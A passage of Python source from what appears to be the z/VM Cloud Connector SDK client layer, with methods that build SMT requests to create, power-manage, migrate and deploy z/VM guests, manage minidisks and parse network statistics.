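# ids '1009', '100a', '100b', returned as '0.0.1009,0.0.100a,0.0.100b'.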
if len(nic_id_2) > 4:
errmsg = ("Virtual device number %s is not valid" % nic_id_2)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2)
def generate_disk_vdev(self, start_vdev=None, offset=0):
"""Generate virtual device number for disks
:param offset: offset of user_root_vdev.
:return: virtual device number, string of 4 bit hex.
"""
if not start_vdev:
start_vdev = CONF.zvm.user_root_vdev
vdev = self._generate_vdev(start_vdev, offset)
if offset >= 0 and offset < 254:
return vdev
else:
msg = ("Failed to generate disk vdev, invalid virtual device"
" number for disk:%s" % vdev)
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
def add_mdisks(self, userid, disk_list, start_vdev=None):
"""Add disks for the userid
:disks: A list dictionary to describe disk info, for example:
disk: [{'size': '1g',
'format': 'ext3',
'disk_pool': 'ECKD:eckdpool1'},
{'size': '1g',
'format': 'ext3'}]
"""
# First, check disk_pool for each disk in disk_list; if disk_pool is
# not specified and not configured (the default value is None), report
# an error.
for idx, disk in enumerate(disk_list):
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
disk['disk_pool'] = disk_pool
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
for idx, disk in enumerate(disk_list):
if 'vdev' in disk:
# this means the user wants to specify their own device number
vdev = disk['vdev']
else:
vdev = self.generate_disk_vdev(start_vdev=start_vdev,
offset=idx)
self._add_mdisk(userid, disk, vdev)
disk['vdev'] = vdev
sizeUpper = disk.get('size').strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'G' and sizeUnit != 'M':
sizeValue = sizeUpper
disk_pool = disk.get('disk_pool')
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
# Convert the cylinders to bytes
convert = 737280
else:
# Convert the blocks to bytes
convert = 512
byteSize = float(float(int(sizeValue) * convert / 1024) / 1024)
unit = "M"
if (byteSize > 1024):
byteSize = float(byteSize / 1024)
unit = "G"
byteSize = "%.1f" % byteSize
disk['size'] = byteSize + unit
return disk_list
def remove_mdisks(self, userid, vdev_list):
for vdev in vdev_list:
self._remove_mdisk(userid, vdev)
def dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
:raddr: A real device number to be dedicated or attached
to the specified image
:mode: Specify a 1 if the virtual device is to be in read-only mode.
Otherwise, specify a 0.
"""
# dedicate device to directory entry
self._dedicate_device(userid, vaddr, raddr, mode)
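# Sketch of the resulting request (illustrative; 'TESTUID' and the device
# numbers are assumed values): dedicate_device('TESTUID', '1000', '0200', 0)
# makes _dedicate_device below issue "changevm TESTUID dedicate 1000 0200 0".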
def _dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device."""
action = 'dedicate'
rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' %
{'uid': userid, 'act': action,
'va': vaddr, 'ra': raddr, 'mod': mode})
action = "dedicate device to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_fcp_info_by_status(self, userid, status=None):
"""get fcp information by the status.
:userid: (str) The name of the image to query fcp info
:status: (str) If status is None, will return the FCP devices
of all statuses. If status specified, will only return the
FCP devices of this status.
The status must be 'active', 'free' or 'offline'.
:returns: (list) a list of string lines that the command output.
"""
action = 'fcpinfo'
if status is None:
# if status is None, will transfer status to all
# to let smtLayer return the FCPs of all the statuses
status = "all"
# always set -k OWNER=YES
rd = ' '.join(['getvm', userid, action, status, "YES"])
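# Illustrative example (assumed userid): for userid 'TESTUID' and
# status 'free', rd is "getvm TESTUID fcpinfo free YES"; with status=None
# the status field defaults to "all".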
action = "query fcp info of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return results['response']
def undedicate_device(self, userid, vaddr):
"""undedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
"""
# undedicate device from directory entry
self._undedicate_device(userid, vaddr)
def _undedicate_device(self, userid, vaddr):
"""undedicate device."""
action = 'undedicate'
rd = ('changevm %(uid)s %(act)s %(va)s' %
{'uid': userid, 'act': action,
'va': vaddr})
action = "undedicate device from userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_image_performance_info(self, userid):
"""Get CPU and memory usage information.
:userid: the zvm userid to be queried
"""
pi_dict = self.image_performance_query([userid])
return pi_dict.get(userid, None)
def get_adapters_info(self, userid):
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Query_Extended" % userid,
"--operands",
"-k 'image_device_number=*'"))
results = None
action = "get network info of userid '%s'" % str(userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ret = results['response']
# TODO: multi NIC support?
nic_count = 0
for line in ret:
if 'adapter_count=' in line:
nic_count = int(line.strip().split('=')[-1])
break
if nic_count < 1:
msg = 'get_network_info:No NIC found on userid %s' % userid
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# save network info into dict by index from 1 to nic_count
# Firstly, get adapter information
adapters_info = []
adapter = dict()
# if found IP, no need to continue
found_mac = False
for line in ret:
if 'adapter_address=' in line:
adapter_addr = line.strip().split('=')[-1]
adapter['adapter_address'] = adapter_addr
if 'adapter_status=' in line:
adapter_type = line.strip().split('=')[-1]
adapter['adapter_status'] = adapter_type
if 'lan_owner=' in line:
lan_owner = line.strip().split('=')[-1]
adapter['lan_owner'] = lan_owner
if 'lan_name=' in line:
lan_name = line.strip().split('=')[-1]
adapter['lan_name'] = lan_name
if 'mac_address=' in line and not found_mac:
mac_addr = line.strip().split('=')[-1]
pattern = re.compile('.{2}')
mac_address = ':'.join(pattern.findall(mac_addr))
adapter['mac_address'] = mac_address
if 'mac_ip_version=' in line:
ip_version = line.strip().split('=')[-1]
adapter['mac_ip_version'] = ip_version
if 'mac_ip_address=' in line:
# once we found mac_ip_address, assume this is the MAC
# we are using, then jump to next adapter
mac_ip = line.strip().split('=')[-1]
adapter['mac_ip_address'] = mac_ip
found_mac = True
if 'adapter_info_end' in line:
adapters_info.append(adapter)
# clear adapter and process next
adapter = dict()
found_mac = False
return adapters_info
def _parse_vswitch_inspect_data(self, rd_list):
""" Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get
inspect data.
"""
def _parse_value(data_list, idx, keyword, offset):
return idx + offset, data_list[idx].rpartition(keyword)[2].strip()
vsw_dict = {}
with zvmutils.expect_invalid_resp_data():
# vswitch count
idx = 0
idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2)
vsw_dict['vswitch_count'] = int(vsw_count)
# deal with each vswitch data
vsw_dict['vswitches'] = []
for i in range(vsw_dict['vswitch_count']):
vsw_data = {}
# skip vswitch number
idx += 1
# vswitch name
idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1)
vsw_data['vswitch_name'] = vsw_name
# uplink count
idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1)
# skip uplink data
idx += int(up_count) * 9
# skip bridge data
idx += 8
# nic count
vsw_data['nics'] = []
idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1)
nic_count = int(nic_count)
for j in range(nic_count):
nic_data = {}
idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1)
userid, toss, vdev = nic_id.partition(' ')
nic_data['userid'] = userid
nic_data['vdev'] = vdev
idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx,
'nic_fr_rx:', 1
)
idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_rx_dsc:', 1
)
idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx,
'nic_fr_rx_err:', 1
)
idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx,
'nic_fr_tx:', 1
)
idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_tx_dsc:', 1
)
idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx,
'nic_fr_tx_err:', 1
)
idx, nic_data['nic_rx'] = _parse_value(rd_list, idx,
'nic_rx:', 1
)
idx, nic_data['nic_tx'] = _parse_value(rd_list, idx,
'nic_tx:', 1
)
vsw_data['nics'].append(nic_data)
# vlan count
idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1)
# skip vlan data
idx += int(vlan_count) * 3
# skip the blank line
idx += 1
vsw_dict['vswitches'].append(vsw_data)
return vsw_dict
def _is_vdev_valid(self, vdev, vdev_info):
for used_vdev in vdev_info:
if (((int(vdev, 16) >= int(used_vdev, 16)) and
(int(vdev, 16) <= int(used_vdev, 16) + 2)) or
((int(vdev, 16) < int(used_vdev, 16)) and
(int(vdev, 16) >= int(used_vdev, 16) - 2))):
return False
return True
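# Illustrative example (assumed values): vdev '1003' is rejected when '1001'
# is already used (it falls in that vdev's +/-2 range), but accepted when
# only '1006' is in use.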
def get_power_state(self, userid):
"""Get power status of a z/VM instance."""
LOG.debug('Querying power stat of %s' % userid)
requestData = "PowerVM " + userid + " status"
action = "query power state of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(requestData)
with zvmutils.expect_invalid_resp_data(results):
status = results['response'][0].partition(': ')[2]
return status
def _check_power_state(self, userid, action):
# Get the vm status
power_state = self.get_power_state(userid)
# Power on the vm if it is inactive
if power_state == 'off':
msg = ('The vm %s is powered off, please start up it '
'before %s' % (userid, action))
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
def guest_start(self, userid):
"""Power on VM."""
requestData = "PowerVM " + userid + " on"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_stop(self, userid, **kwargs):
"""Power off VM."""
requestData = "PowerVM " + userid + " off"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_softstop(self, userid, **kwargs):
"""Power off VM gracefully, it will call shutdown os then
deactivate vm"""
requestData = "PowerVM " + userid + " softoff --wait"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
else:
requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout)
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
else:
requestData += ' --poll ' + str(CONF.guest.softstop_interval)
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_pause(self, userid):
self._check_power_state(userid, 'pause')
requestData = "PowerVM " + userid + " pause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_unpause(self, userid):
self._check_power_state(userid, 'unpause')
requestData = "PowerVM " + userid + " unpause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reboot(self, userid):
requestData = ' '.join(("PowerVM", userid, "reboot"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reset(self, userid):
requestData = ' '.join(("PowerVM", userid, "reset"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def live_migrate_move(self, userid, destination, parms):
""" moves the specified virtual machine, while it continues to run,
to the specified system within the SSI cluster. """
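# Sketch of a constructed request (illustrative; userid, destination and
# parms are assumed values): for userid 'TESTUID', destination 'SSINODE2'
# and parms {'maxtotal': 10, 'immediate': ''}, the request becomes
# "migratevm TESTUID move --destination SSINODE2 --maxtotal 10 --immediate".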
rd = ('migratevm %(uid)s move --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
if 'maxtotal' in parms:
rd += ('--maxtotal ' + str(parms['maxtotal']))
if 'maxquiesce' in parms:
rd += (' --maxquiesce ' + str(parms['maxquiesce']))
if 'immediate' in parms:
rd += " --immediate"
if 'forcearch' in parms:
rd += " --forcearch"
if 'forcedomain' in parms:
rd += " --forcedomain"
if 'forcestorage' in parms:
rd += " --forcestorage"
action = "move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def live_migrate_test(self, userid, destination):
""" tests the specified virtual machine and reports whether or not
it is eligible to be relocated to the specified system. """
rd = ('migratevm %(uid)s test --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
action = "test to move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def _get_ipl_param(self, ipl_from):
if len(ipl_from) > 0:
ipl_param = ipl_from
else:
ipl_param = CONF.zvm.user_root_vdev
return ipl_param
def create_vm(self, userid, cpu, memory, disk_list, profile,
max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam,
dedicate_vdevs, loaddev, account, comment_list,
cschedule='', cshare='', rdomain='', pcif=''):
""" Create VM and add disks if specified. """
rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s '
'--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i '
'--maxMemSize %(max_mem)s --setReservedMem' %
{'uid': userid, 'mem': memory,
'pri': const.ZVM_USER_DEFAULT_PRIVILEGE,
'cpu': cpu, 'prof': profile,
'max_cpu': max_cpu, 'max_mem': max_mem})
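        # Illustrative example (hypothetical values): userid='VM1',
        # memory=2048, cpu=2, profile='OSDFLT', max_cpu=4, max_mem='4G'
        # gives a base request like
        #   "makevm VM1 directory LBYONLY 2048m <default privilege>
        #    --cpus 2 --profile OSDFLT --maxCPU 4 --maxMemSize 4G
        #    --setReservedMem"
        # before the optional flags below are appended.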
if CONF.zvm.default_admin_userid:
ids = CONF.zvm.default_admin_userid.split(' ')
id_str = ':'.join(ids)
rd += (' --logonby %s' % id_str)
        # When using DASD as the root disk, disk_list[0] is the boot
        # disk.
        # When booting from volume, ipl_from should be specified explicitly.
if (disk_list and 'is_boot_disk' in disk_list[0] and
disk_list[0]['is_boot_disk']) or ipl_from:
            # We assume at least one disk exists, which means is_boot_disk
            # is true for exactly one disk.
rd += (' --ipl %s' % self._get_ipl_param(ipl_from))
# load param for ipl
if ipl_param:
rd += ' --iplParam %s' % ipl_param
if ipl_loadparam:
rd += ' --iplLoadparam %s' % ipl_loadparam
if dedicate_vdevs:
rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs)
if account:
rd += ' --account "%s"' % account
if cschedule:
rd += ' --commandSchedule %s' % cschedule
if cshare:
rd += ' --commandSetShare "%s"' % cshare
if rdomain:
rd += ' --commandRDomain %s' % rdomain
if pcif:
v = pcif.split(':')
if len(v) != 2:
errmsg = ("pcif input %s is invalid, must be format like"
" <dev>:<dev>" % pcif)
raise exception.SDKInvalidInputFormat(msg=errmsg)
rd += ' --commandPcif %s' % pcif
comments = ''
if comment_list is not None:
for comment in comment_list:
comments += comment
                # This is a dummy splitter used to separate the comments.
                # For example, input comments comment1,comment2 are
                # constructed into comment1$@$@$comment2 and sent to
                # smtLayer to handle.
if comments:
rd += ' --comment "%s"' % comments
if loaddev:
if 'portname' in loaddev:
rd += ' --loadportname %s' % loaddev['portname']
if 'lun' in loaddev:
rd += ' --loadlun %s' % loaddev['lun']
        # Now consider the swap-only case: the customer boots from volume
        # but provides no disk pool, so by default the swap disk is
        # created from a vdisk. When we reach this logic we are sure
        # that, with no disk pool, there is only one disk in disk_list
        # and it is the swap disk.
vdisk = None
        # This is the swap-only case: only a swap disk is created
        # (len(disk_list) is 1) and no other disks.
if len(disk_list) == 1:
disk = disk_list[0]
if 'format' in disk and disk['format'].lower() == 'swap':
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
if disk_pool is None:
# if it's vdisk, then create user direct directly
vd = disk.get('vdev') or self.generate_disk_vdev(offset=0)
disk['vdev'] = vd
sizeUpper = disk['size'].strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'M' and sizeUnit != 'G':
errmsg = ("%s must has 'M' or 'G' suffix" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
if sizeUnit == 'M':
size = int(sizeUpper[:-1])
if size > 2048:
errmsg = ("%s is great than 2048M" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
if sizeUnit == 'G':
size = int(sizeUpper[:-1])
if size > 2:
errmsg = ("%s is great than 2G" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
rd += ' --vdisk %s:%s' % (vd, sizeUpper)
vdisk = disk
action = "create userid '%s'" % userid
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 436) and (err.results['rs'] == 4)):
result = "Profile '%s'" % profile
raise exception.SDKObjectNotExistError(obj_desc=result,
modID='guest')
else:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
# Add the guest to db immediately after user created
action = "add guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.add_guest(userid)
        # Continue to add disks: if vdisk is None, this is not the
        # vdisk-only routine and we need to add the disks.
if vdisk is None and disk_list:
            # Do not perform mkfs against the root disk
if disk_list[0].get('is_boot_disk'):
disk_list[0].update({'format': 'none'})
return self.add_mdisks(userid, disk_list)
        # We must return the swap disk so that the guest config
        # can handle the remaining jobs.
return disk_list
def _add_mdisk(self, userid, disk, vdev):
"""Create one disk for userid
NOTE: No read, write and multi password specified, and
access mode default as 'MR'.
"""
size = disk['size']
fmt = disk.get('format', 'ext4')
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
# Check disk_pool, if it's None, report error
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
action = 'add3390'
else:
action = 'add9336'
rd = ' '.join(['changevm', userid, action, diskpool_name,
                       vdev, size, '--mode MR'])
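        # Illustrative example (hypothetical values): with disk_pool
        # 'ECKD:POOL1', vdev '0101' and size '3g' the request is
        #   "changevm VM1 add3390 POOL1 0101 3g --mode MR"
        # with " --filesystem ext4" appended when a format is requested.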
if fmt and fmt != 'none':
rd += (' --filesystem %s' % fmt.lower())
action = "add mdisk to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_vm_list(self):
"""Get the list of guests that are created by SDK
return userid list"""
action = "list all guests in database"
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.get_guest_list()
guests_migrated = \
self._GuestDbOperator.get_migrated_guest_info_list()
# db query return value in tuple (uuid, userid, metadata, comments)
userids_in_db = [g[1].upper() for g in guests_in_db]
userids_migrated = [g[1].upper() for g in guests_migrated]
userid_list = list(set(userids_in_db) - set(userids_migrated))
return userid_list
def _remove_mdisk(self, userid, vdev):
rd = ' '.join(('changevm', userid, 'removedisk', vdev))
action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def guest_authorize_iucv_client(self, userid, client=None):
"""Punch a script that used to set the authorized client userid in vm
If the guest is in log off status, the change will take effect when
the guest start up at first time.
If the guest is in active status, power off and power on are needed
for the change to take effect.
:param str guest: the user id of the vm
:param str client: the user id of the client that can communicate to
guest using IUCV"""
client = client or zvmutils.get_smt_userid()
iucv_path = "/tmp/" + userid
if not os.path.exists(iucv_path):
os.makedirs(iucv_path)
iucv_auth_file = iucv_path + "/iucvauth.sh"
zvmutils.generate_iucv_authfile(iucv_auth_file, client)
try:
requestData = "ChangeVM " + userid + " punchfile " + \
iucv_auth_file + " --class x"
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:"
" %s" % (userid, err.format_message()))
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
finally:
self._pathutils.clean_temp_folder(iucv_path)
def volume_refresh_bootmap(self, fcpchannels, wwpns, lun, wwid='',
transportfiles=None, guest_networks=None):
guest_networks = guest_networks or []
fcps = ','.join(fcpchannels)
ws = ','.join(wwpns)
fcs = "--fcpchannel=%s" % fcps
wwpns = "--wwpn=%s" % ws
lun = "--lun=%s" % lun
wwid = "--wwid=%s" % wwid
paths = "--minfcp=%s" % CONF.volume.min_fcp_paths_count
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns,
lun, wwid, paths]
if guest_networks:
# prepare additional parameters for RHCOS BFV
if not transportfiles:
err_msg = 'Ignition file is required when deploying RHCOS'
LOG.error(err_msg)
raise exception.SDKVolumeOperationError(rs=10)
# get NIC ID
from zvmsdk import dist
_dist_manager = dist.LinuxDistManager()
linuxdist = _dist_manager.get_linux_dist("rhcos4")()
ip_config = linuxdist.create_coreos_parameter(guest_networks)
nic_id = self._generate_increasing_nic_id(
ip_config.split(":")[5].replace("enc", ""))
cmd += ["--ignitionurl=%s" % transportfiles, "--nicid=%s" % nic_id,
"--ipconfig=%s" % ip_config]
LOG.info("Running command: %s", cmd)
try:
(rc, output) = zvmutils.execute(cmd,
timeout=CONF.volume.refresh_bootmap_timeout)
except subprocess.TimeoutExpired as err:
err_msg = err.format_message()
raise exception.SDKVolumeOperationError(rs=7, msg=err_msg)
except PermissionError:
            # Because the zvmsdk user doesn't have permission to kill the
            # background process, a timed-out execute raises PermissionError;
            # we also treat it as a timeout exception.
err_msg = ("Running command: %s timed out." % cmd)
raise exception.SDKVolumeOperationError(rs=7, msg=err_msg)
if rc != 0:
err_msg = ("refresh_bootmap failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("Exit MSG:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKVolumeOperationError(rs=5,
errcode=rc,
errmsg=err_output)
output_lines = output.split('\n')
paths_dict = {}
for line in output_lines:
if line.__contains__("RESULT PATHS: "):
paths_str = line[14:]
# paths_str format: "FCP1:W1 W2,FCP2:W3 W4"
# convert paths string into a dict
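                # e.g. (hypothetical values) "1A10:W1 W2,1B10:W3 W4" becomes
                #   {'1A10': ['W1', 'W2'], '1B10': ['W3', 'W4']}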
paths_list = paths_str.split(',')
for path in paths_list:
fcp, wwpn = path.split(':')
wwpn_list = wwpn.split(' ')
paths_dict[fcp] = wwpn_list
return paths_dict
def guest_deploy(self, userid, image_name, transportfiles=None,
remotehost=None, vdev=None, skipdiskcopy=False):
""" Deploy image and punch config driver to target """
        # (TODO: add support for deploying multiple disks)
if skipdiskcopy:
            msg = ('Start guest_deploy without unpackdiskimage, guest: '
                   '%(vm)s, os_version: %(img)s'
                   % {'img': image_name, 'vm': userid})
LOG.info(msg)
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
cmd = ['/usr/bin/hexdump', '-C', '-n', '64', image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
msg = ('Image header info in guest_deploy: rc: %d, header:\n%s'
% (rc, output))
LOG.info(msg)
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
# Purge guest reader to clean dirty data
rd = ("changevm %s purgerdr" % userid)
action = "purge reader of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
# Punch transport files if specified
if transportfiles:
# Copy transport file to local
msg = ('Start to send customized file to vm %s' % userid)
LOG.info(msg)
try:
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
if remotehost:
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
else:
cmd = ["/usr/bin/cp", transportfiles, local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy config drive with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
# Punch config drive to guest userid
rd = ("changevm %(uid)s punchfile %(file)s --class X" %
{'uid': userid, 'file': local_trans})
action = "punch config drive to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
finally:
# remove the local temp config drive folder
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Authorize iucv client
client_id = None
        # Try to re-use the previously authorized iucv userid first
if os.path.exists(const.IUCV_AUTH_USERID_PATH):
LOG.debug("Re-use previous iucv authorized userid")
with open(const.IUCV_AUTH_USERID_PATH) as f:
client_id = f.read().strip()
self.guest_authorize_iucv_client(userid, client_id)
# Update os version in guest metadata
        # TODO: maybe this should append to the old metadata, not replace it
if skipdiskcopy:
os_version = image_name
else:
image_info = self._ImageDbOperator.image_query_record(image_name)
os_version = image_info[0]['imageosdistro']
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
            msg = ('guest_deploy without unpackdiskimage finished '
                   'successfully, guest: %(vm)s, os_version: %(img)s'
                   % {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_deploy_rhcos(self, userid, image_name, transportfiles,
remotehost=None, vdev=None, hostname=None,
skipdiskcopy=False):
""" Deploy image"""
        # (TODO: add support for deploying multiple disks)
if transportfiles is None:
err_msg = 'Ignition file is required when deploying RHCOS image'
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=13, userid=userid)
if skipdiskcopy:
            msg = ('Start guest_deploy without copying the disk, guest: '
                   '%(vm)s, os_version: %(img)s'
                   % {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = None
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
tmp_trans_dir = None
try:
if remotehost:
                # Download the ignition file from the remote host
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy ignition file with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
transportfiles = local_trans
cmd = self._get_unpackdiskimage_cmd_rhcos(userid, image_name,
transportfiles, vdev,
image_file, hostname,
skipdiskcopy)
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
finally:
# remove the temp ignition file
if tmp_trans_dir:
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Update os version in guest metadata
        # TODO: maybe this should append to the old metadata, not replace it
if skipdiskcopy:
os_version = image_name
else:
os_version = self.image_get_os_distro(image_name)
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
            msg = ('guest_deploy without copying the disk finished '
                   'successfully, guest: %(vm)s, os_version: %(img)s'
                   % {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def get_os_version_from_userid(self, userid):
"""Get the os_verison of guests from userid.
return os_version or UNKNOWN"""
action = "get guests os_version from userid."
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.\
get_guest_metadata_with_userid(userid)
        # The db query returns metadata in a tuple (metadata)
os_version = 'UNKNOWN'
for g in guests_in_db:
if 'os_version='.upper() in g[0].upper():
os_version = g[0].upper().strip().split('=')[1]
break
